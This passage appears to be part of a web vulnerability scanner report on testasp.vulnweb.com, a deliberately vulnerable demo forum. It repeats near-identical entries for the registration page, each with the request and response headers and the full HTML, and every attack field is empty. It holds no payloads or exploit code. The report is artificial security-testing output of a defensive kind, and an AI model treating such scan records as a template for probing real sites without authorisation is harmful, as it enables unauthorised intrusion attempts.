<tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 